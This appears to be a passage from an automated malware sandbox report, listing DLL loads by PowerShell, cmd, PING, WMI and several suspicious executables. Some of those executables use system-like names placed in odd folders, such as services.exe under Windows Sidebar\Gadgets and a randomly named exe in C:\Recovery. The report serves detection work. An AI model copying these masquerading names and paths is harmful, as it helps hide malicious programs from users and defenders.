                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: apphelp.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: sspicli.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: apphelp.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: mscoree.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: version.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: wldp.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: profapi.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: apphelp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: version.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: wldp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: profapi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: sspicli.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: version.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: wldp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: profapi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: sspicli.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: apphelp.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: version.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: windows.storage.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: wldp.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: profapi.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: sspicli.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: mscoree.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: kernel.appcore.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: version.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: windows.storage.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: wldp.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: profapi.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: cryptsp.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: rsaenh.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: cryptbase.dll
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: mscoree.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: kernel.appcore.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: version.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: wldp.dll
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeSection loaded: profapi.dll
